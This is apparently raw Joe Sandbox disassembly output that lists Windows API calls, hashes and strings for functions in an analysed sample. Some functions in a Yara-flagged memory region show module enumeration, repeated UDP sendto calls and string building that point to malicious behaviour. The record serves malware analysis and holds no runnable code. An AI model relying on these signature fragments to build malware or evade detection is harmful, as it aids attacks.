                                    • Instruction ID: 7b686e279c0adb77db5c4e3be3aeaf0dff3e31c97ecae2bc57fd082c4c7f68c9
                                    • Opcode Fuzzy Hash: 4f9cfca9db7b09f080ec9857a116f6212edf3f639a15fb9e6cb19dfc517ad06b
                                    • Instruction Fuzzy Hash: CC61C5B6D00228DBDB18DFA5D985BED77B2AF88300F5084BAE50DD6280D7759A58CF90
                                    APIs
                                    • GetCapture.USER32 ref: 00435566
                                    • ClientToScreen.USER32(?,?), ref: 004355A3
                                    • OffsetRect.USER32(?,?,?), ref: 004355CC
                                    • GetParent.USER32(?), ref: 004355D2
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2CFE
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2D07
                                    • GetClientRect.USER32(?,?), ref: 004355F5
                                    • OffsetRect.USER32(?,?,00000000), ref: 00435613
                                    • OffsetRect.USER32(?,?,00000000), ref: 0043562B
                                    • OffsetRect.USER32(?,00000000,?), ref: 00435649
                                    • OffsetRect.USER32(?,00000000,?), ref: 00435669
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Offset$Client$Screen$CaptureParent
                                    • String ID:
                                    • API String ID: 838496554-0
                                    • Opcode ID: 747a0ceb4a7c36e700f4cc987daf37e5f20a600d6fffe1f901eb77bdd9a0e7f1
                                    • Instruction ID: 118e1aa9b73e0de09bc6f39ec81b5df2977eadc88d260189d8fadb8fc9cb10d7
                                    • Opcode Fuzzy Hash: 747a0ceb4a7c36e700f4cc987daf37e5f20a600d6fffe1f901eb77bdd9a0e7f1
                                    • Instruction Fuzzy Hash: 3A4118B5604301AFD708DF68C985D6FB7E9EBC8704F008A2DF586C7250DB74ED088A66
                                    APIs
                                    • InvalidateRect.USER32(?,?,00000001,?,?,?,?), ref: 00432C2A
                                    • GetTopWindow.USER32(?), ref: 00432C30
                                    • IsWindowVisible.USER32(00000000), ref: 00432C41
                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 00432C52
                                    • GetClientRect.USER32(00000000,?), ref: 00432CA5
                                    • IntersectRect.USER32(?,?,?), ref: 00432CBA
                                    • IsRectEmpty.USER32(?), ref: 00432CC5
                                    • InvalidateRect.USER32(00000000,00000000,00000000,?,?,?,?), ref: 00432CD6
                                    • GetWindow.USER32(00000000,00000002), ref: 00432CDB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$Invalidate$ClientEmptyIntersectLongVisible
                                    • String ID:
                                    • API String ID: 938479747-0
                                    • Opcode ID: a99dba9726537121dcec7652896c0f07d5a641c4eb96109069eb0d572cdaff2d
                                    • Instruction ID: d53c30d1d2089028759a42fcd0cf7866a06b9aed2857651fc785077b4c650c8a
                                    • Opcode Fuzzy Hash: a99dba9726537121dcec7652896c0f07d5a641c4eb96109069eb0d572cdaff2d
                                    • Instruction Fuzzy Hash: 1D217C71600316ABD314DF15DD84DAFB7ACFF88305F044A2EF94593250EB74E9458BAA
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0042494F
                                    • CreateRectRgn.GDI32(00000000,00000000,00000001,?), ref: 00424A70
                                    • SetRect.USER32(?,00000000,00000000,00000001,?), ref: 00424A99
                                      • Part of subcall function 004193D0: __ftol.LIBCMT ref: 004194F5
                                      • Part of subcall function 004193D0: __ftol.LIBCMT ref: 00419502
                                    • FillRgn.GDI32(?,?,?), ref: 00424B16
                                    • PatBlt.GDI32(?,00000000,00000000,00000001,?,00F00021), ref: 00424B89
                                      • Part of subcall function 00413AA0: GetSysColor.USER32(0000000F), ref: 00413AAD
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • GetObjectA.GDI32(?,00000018,?), ref: 00424C05
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Create__ftol$BrushClientColorFillH_prologObjectSolid
                                    • String ID: pTL
                                    • API String ID: 522557250-168633513
                                    • Opcode ID: f1069559148a93060107b759154f761520e5e06146e714d3b7cee3f679a40e2c
                                    • Instruction ID: cdfa35689f24075be06475114f615b7ba44637e7e2504af081bf02d55d0d71ef
                                    • Opcode Fuzzy Hash: f1069559148a93060107b759154f761520e5e06146e714d3b7cee3f679a40e2c
                                    • Instruction Fuzzy Hash: 7DC19D712083419FC354DF65D885F6BB7E8ABD4708F44491EF186C3291EBB8E908CB6A
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0043456D
                                    • GetSysColor.USER32(0000000F), ref: 0043457E
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004345C8
                                    • GetClientRect.USER32(?,?), ref: 004345E1
                                    • LoadBitmapA.USER32(?,?), ref: 00434618
                                    • GetObjectA.GDI32(?,00000018,?), ref: 00434667
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Object$H_prologRectSelect$BeginBitmapBrushClientClipColorCreateEmptyLoadPaintSolid
                                    • String ID: pTL
                                    • API String ID: 4061870766-168633513
                                    • Opcode ID: d22ffcdc13dcaf1a467ddecce6941c73bc44ea62a6a44f10aaf00481aa76cc3c
                                    • Instruction ID: 1810d52f328164b7834b3c8153f03923395e9a7b7f6e2ce0be090faeb37407d3
                                    • Opcode Fuzzy Hash: d22ffcdc13dcaf1a467ddecce6941c73bc44ea62a6a44f10aaf00481aa76cc3c
                                    • Instruction Fuzzy Hash: B36149765083819FD354DB65C945FABBBE8FBC9704F048A2DF19983280DB78A904CB66
                                    APIs
                                    • SendMessageA.USER32(?,0000019F,00000000,00000000), ref: 004C4C35
                                    • GetParent.USER32(?), ref: 004C4C3C
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 004C4C8F
                                    • SendMessageA.USER32(?,00000111,?,?), ref: 004C4CE0
                                    • SendMessageA.USER32(?,00000185,00000000,00000000), ref: 004C4D6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongParentWindow
                                    • String ID: $]+B
                                    • API String ID: 779260966-2725609542
                                    • Opcode ID: 22e007e18bb943cde32e8129e9c2c4aeb771ce47ad7be2881f0389a9d8177362
                                    • Instruction ID: 9b5616c318e72614e4003df6d61864881c307661c9acb2d4e8240fcd43d4804c
                                    • Opcode Fuzzy Hash: 22e007e18bb943cde32e8129e9c2c4aeb771ce47ad7be2881f0389a9d8177362
                                    • Instruction Fuzzy Hash: 3F31E4782107186FCAA47A368DA0F3FB59DEBC4788B11492FF543C2291DA2DDC024679
                                    APIs
                                    • CreatePopupMenu.USER32 ref: 00437AFE
                                    • AppendMenuA.USER32(?,?,00004E34,?), ref: 00437C61
                                    • AppendMenuA.USER32(?,00000000,00004E34,?), ref: 00437C99
                                    • ModifyMenuA.USER32(?,00004E34,00000000,00004E34,00004E34), ref: 00437CB7
                                    • AppendMenuA.USER32(?,?,00000000,?), ref: 00437D15
                                    • ModifyMenuA.USER32(?,?,?,?,?), ref: 00437D3A
                                    • AppendMenuA.USER32(?,?,?,?), ref: 00437D82
                                    • ModifyMenuA.USER32(?,?,?,?,?), ref: 00437DA7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$Append$Modify$CreatePopup
                                    • String ID:
                                    • API String ID: 3846898120-0
                                    • Opcode ID: b6c324ebf6d82f4da4ae19e17894f17d27b918a506a1d707fee6b1c05678ad7e
                                    • Instruction ID: 2562361174f688096016e80903cba8223acef38019fd2c3e83390ad70d6ce062
                                    • Opcode Fuzzy Hash: b6c324ebf6d82f4da4ae19e17894f17d27b918a506a1d707fee6b1c05678ad7e
                                    • Instruction Fuzzy Hash: 3DD17BB1A083109BC724DF19D880B6BB7E4FF89714F14492EF98597351E739AD04CB9A
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004AF7F7
                                    • GetStdHandle.KERNEL32(000000F4,005ADA04,00000000,?,00000000,?), ref: 004AF8CD
                                    • WriteFile.KERNEL32(00000000), ref: 004AF8D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: File$HandleModuleNameWrite
                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                    • API String ID: 3784150691-4022980321
                                    • Opcode ID: 1c902af9e13bfc15a5b4eed6ccc3d91ff65314bd7102934c740c0b2c12b9a2ab
                                    • Instruction ID: 47903e3b742fe88d6eb4045abf554d7792539e90d53d8802c4ad06ac2a74b77a
                                    • Opcode Fuzzy Hash: 1c902af9e13bfc15a5b4eed6ccc3d91ff65314bd7102934c740c0b2c12b9a2ab
                                    • Instruction Fuzzy Hash: 3931D672A002086FEF20FAA5CD45FEE77ADEB56304F50006FF545E6181D6B8E9498B25
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: accept
                                    • String ID: %s:%d$P
                                    • API String ID: 3005279540-612342447
                                    • Opcode ID: 21d9c9f3a7aaa021ea2ffc47ef136dd4acebea34277fd51d2b85a00cbf923f7c
                                    • Instruction ID: 62b55f1a3e4caedb94a197477bd8de60541f53f619b3f0787c2ac5dbccf8f3cd
                                    • Opcode Fuzzy Hash: 21d9c9f3a7aaa021ea2ffc47ef136dd4acebea34277fd51d2b85a00cbf923f7c
                                    • Instruction Fuzzy Hash: 2D317331604A019FD314EB69DC99DBFB3E8FBD4324F004A2DF5A5922D0EB74A90A8B55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e090d64062c982b48b40c42944b918bbfa007306d65a0a477db5de4cebe3a76e
                                    • Instruction ID: b5efdc66356610e75de02cdc537d97b48d1299cbfed8d312d3cda4a39d100d43
                                    • Opcode Fuzzy Hash: e090d64062c982b48b40c42944b918bbfa007306d65a0a477db5de4cebe3a76e
                                    • Instruction Fuzzy Hash: BCC1CCB0704750CFD338CF69D885A6BB7E4EF85318F504A2EE59687791CB38A805CB26
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0242506C
                                    • Module32First.KERNEL32(?,00000224), ref: 0242508F
                                    • CharUpperA.USER32(?,00000008,?,?), ref: 024250A8
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • Module32Next.KERNEL32(?,00000224), ref: 024250F8
                                    • CloseHandle.KERNEL32(?,00000008,?,?), ref: 02425108
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Module32tolower$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                    • String ID: DWEBIO$DWEBLLIO
                                    • API String ID: 86103281-3981995823
                                    • Opcode ID: de2fdcbc77f2fb0dcf612acaecc84ad4bd1b90bcc46b2570e734b556569cab94
                                    • Instruction ID: 6469c723c172ba351acf29e39f111123634fe6e45b9721b6c3d48583bcec6bcd
                                    • Opcode Fuzzy Hash: de2fdcbc77f2fb0dcf612acaecc84ad4bd1b90bcc46b2570e734b556569cab94
                                    • Instruction Fuzzy Hash: 35216971900229ABDB25DBA6DD58BDAB7B9AF4C300F9045DAD508A2240DB75DA88CF90
                                    APIs
                                    • InterlockedExchange.KERNEL32(02498658,00000000), ref: 024235FE
                                    • htons.WS2_32(?), ref: 024236E4
                                      • Part of subcall function 02422FA0: socket.WS2_32(00000002,00000002,00000011), ref: 02423008
                                      • Part of subcall function 02422FA0: sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423072
                                      • Part of subcall function 02422FA0: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 0242314A
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423773
                                    • htons.WS2_32(?), ref: 02423793
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423803
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 024238AF
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 024238FB
                                      • Part of subcall function 02422399: RtlEnterCriticalSection.NTDLL(02434050), ref: 02422410
                                      • Part of subcall function 02422399: RtlLeaveCriticalSection.NTDLL(02434050), ref: 02422724
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423903
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: sendto$CriticalSectionhtons$EnterExchangeExitInterlockedLeaveThreadUserselectsocket
                                    • String ID:
                                    • API String ID: 3382933480-0
                                    • Opcode ID: b6cd93232c76744c4d422555610a4e78ffb816d94a8b883e1b33f06532cea989
                                    • Instruction ID: 67fb0a8070e955dd6c1b8fa64d69fec72176694ebabab0ff781dec6424861190
                                    • Opcode Fuzzy Hash: b6cd93232c76744c4d422555610a4e78ffb816d94a8b883e1b33f06532cea989
                                    • Instruction Fuzzy Hash: 53A19271D082A89ADF20CB64CC91BEAB775AF44700F5045DAF6CDAA280D7F55AC8CF51
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • GetClientRect.USER32(?,?), ref: 004243AE
                                    • IntersectRect.USER32(?,?,?), ref: 004243C6
                                    • IsRectEmpty.USER32(?), ref: 004243F6
                                    • GetObjectA.GDI32(?,00000018,?), ref: 0042442D
                                    • IntersectRect.USER32(?,?,?), ref: 004244A8
                                    • IsRectEmpty.USER32(?), ref: 004244B3
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00424576
                                    • IsWindow.USER32(?), ref: 004245D8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$EmptyIntersect$BeginClientClipH_prologObjectPaintWindow
                                    • String ID:
                                    • API String ID: 611846025-0
                                    • Opcode ID: dc8e01ebcd05ee70272f4933fd7ef20f4af080a48b019e5b921ec7157ea96930
                                    • Instruction ID: 9d3f052779077e2402b54e519e9242df3a4936652b9d6714be31234adec7d555
                                    • Opcode Fuzzy Hash: dc8e01ebcd05ee70272f4933fd7ef20f4af080a48b019e5b921ec7157ea96930
                                    • Instruction Fuzzy Hash: 6F814BB55083459FC364DF25D984E6BB7E8FBC8704F008A2EF59A83240D774E909CB66
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0242DABE
                                    • lstrcat.KERNEL32(00000000,024A5708), ref: 0242DB20
                                    • lstrcat.KERNEL32(00000000,024A570C), ref: 0242DB32
                                    • lstrcat.KERNEL32(00000000,024A5710), ref: 0242DB5B
                                    • lstrlen.KERNEL32(00000000,%s,0242E3E7,?,?,?,?,?,?), ref: 0242DB71
                                    • wsprintfA.USER32 ref: 0242DB7F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0242DB93
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
                                    • String ID: %s
                                    • API String ID: 3923932729-3043279178
                                    • Opcode ID: c01ebf1bd99c5d054a37d117fef2e99d26a2192628c5e0805e964029a6c66ae0
                                    • Instruction ID: c74c0a7083a25789a06e9fc3daccc7c4452464d1b90b674c7bf2ea54f6e2217a
                                    • Opcode Fuzzy Hash: c01ebf1bd99c5d054a37d117fef2e99d26a2192628c5e0805e964029a6c66ae0
                                    • Instruction Fuzzy Hash: 4931EBB5D40228DBEB28DFA5CD85BED7776AF4C300F9044B9E109D6180D7759658CF50
                                    APIs
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • GetTickCount.KERNEL32 ref: 02425B71
                                    • lstrlen.KERNEL32(0242B8F8,024A400C,00000000,?,?,?,?,0242B8F8,00000000), ref: 02425B83
                                    • wsprintfA.USER32 ref: 02425B8F
                                    • GetTickCount.KERNEL32 ref: 02425B50
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • GetTickCount.KERNEL32 ref: 02425B9A
                                    • GetTickCount.KERNEL32 ref: 02425BBB
                                    • lstrlen.KERNEL32(0242B8F8,024A4004,00000000,?,?,?,?,0242B8F8,00000000), ref: 02425BCD
                                    • wsprintfA.USER32 ref: 02425BD9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick$lstrlentolowerwsprintf$ExchangeInterlocked
                                    • String ID:
                                    • API String ID: 400381017-0
                                    • Opcode ID: 37807a791180407f0f82e94b4a8695811e263d29d065a3bbe8cdf1561880b484
                                    • Instruction ID: 20b194b32cc47769d6bc9b0556a1e2f5c7fee7bfd6faf523cbc6cee14adead28
                                    • Opcode Fuzzy Hash: 37807a791180407f0f82e94b4a8695811e263d29d065a3bbe8cdf1561880b484
                                    • Instruction Fuzzy Hash: 6821A876E401106BD71C9BA6DC49FAA3F9DEF48381F444929F90DCB340DA35E924CBA1
                                    APIs
                                    • GetTempPathA.KERNEL32(00000080,00000000,?), ref: 02425C17
                                    • lstrlen.KERNEL32(00000000), ref: 02425C21
                                    • lstrcat.KERNEL32(00000000,024A55F4), ref: 02425C3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02425C5A
                                    • lstrlen.KERNEL32(00000000,024A41D4,00000000), ref: 02425C88
                                    • wsprintfA.USER32 ref: 02425C94
                                    • lstrlen.KERNEL32(00000000,024A41E0,00000000), ref: 02425CB1
                                    • wsprintfA.USER32 ref: 02425CBD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                    • String ID:
                                    • API String ID: 2776683041-0
                                    • Opcode ID: f540022a22d4e9a06e588c758f98fad392273cb7f14b671e6359ea9f4576fbd1
                                    • Instruction ID: 8549f5b80e5ca9936e0657416002086a4965d228616bf157b5f57f7fc28deb92
                                    • Opcode Fuzzy Hash: f540022a22d4e9a06e588c758f98fad392273cb7f14b671e6359ea9f4576fbd1
                                    • Instruction Fuzzy Hash: F421DAB5A40114AFD708DF68D988FEA7B79AF98304F408559FA0D87340DA75DA94CF90
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0041DB7C
                                    • PtInRect.USER32(?,?,?), ref: 0041DB91
                                    • ReleaseCapture.USER32 ref: 0041DBA1
                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0041DBAF
                                    • GetCapture.USER32 ref: 0041DBBF
                                    • SetCapture.USER32(?), ref: 0041DBCA
                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0041DBEB
                                    • SetCapture.USER32(?), ref: 0041DBF5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CaptureRect$Invalidate$ClientRelease
                                    • String ID:
                                    • API String ID: 3559558096-0
                                    • Opcode ID: 6b2d81427ffc2f60955a4c16d43ae5d42a8e60f37a6df78774fc584419ee544d
                                    • Instruction ID: 845660daffce57ea6d5cdf62980bd52e62d197c013a0f93652b02f8d53a6549d
                                    • Opcode Fuzzy Hash: 6b2d81427ffc2f60955a4c16d43ae5d42a8e60f37a6df78774fc584419ee544d
                                    • Instruction Fuzzy Hash: C2112A75900710AFD764EB68DC48FABB7A8BF54705F40892EF686C6250EB35F804CB68
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00411E4A
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 00411E5B
                                    • VariantClear.OLEAUT32(?), ref: 004121FB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCopyInit
                                    • String ID:
                                    • API String ID: 1785138364-0
                                    • Opcode ID: e2e5e395a29593ccdb420bef05903e56570fe5719726a131e08e012fa538a7fb
                                    • Instruction ID: 758d0668a85cbd1e27090c2d9ad8d85be2bc746f19a3d41977ad39db9655a3cc
                                    • Opcode Fuzzy Hash: e2e5e395a29593ccdb420bef05903e56570fe5719726a131e08e012fa538a7fb
                                    • Instruction Fuzzy Hash: 9EC17D756082529FD314CF68C680AABB7F4BB89700F14482EEA91C7360D379DC96DB5B
                                    APIs
                                    • IsWindow.USER32(?), ref: 00426C1D
                                    • GetParent.USER32(?), ref: 00426C2F
                                    • SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00426C57
                                    • GetWindowRect.USER32(?,?), ref: 00426CE1
                                    • InvalidateRect.USER32(?,?,00000001,?), ref: 00426D04
                                    • GetWindowRect.USER32(?,?), ref: 00426ECC
                                    • InvalidateRect.USER32(?,?,00000001,?), ref: 00426EED
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$Invalidate$MessageParentSend
                                    • String ID:
                                    • API String ID: 236041146-0
                                    • Opcode ID: f2be2b3cb2c673cf38bb76c50c68f222823f65f888cc6050d959affe30661979
                                    • Instruction ID: f05277a49bb36b9f0e7a4b2654acbcc00c52182db2504a352a4b761dfc2ba362
                                    • Opcode Fuzzy Hash: f2be2b3cb2c673cf38bb76c50c68f222823f65f888cc6050d959affe30661979
                                    • Instruction Fuzzy Hash: 4D91E1317003159BD764EF25EC40B6B73E4AF84748F560A2EF9459B282EB38ED058B99
                                    APIs
                                    • GetObjectA.GDI32(?,00000018,?), ref: 0043816D
                                    • MulDiv.KERNEL32(?,?,00000064), ref: 004381A2
                                    • MulDiv.KERNEL32(?,?,00000064), ref: 004381CD
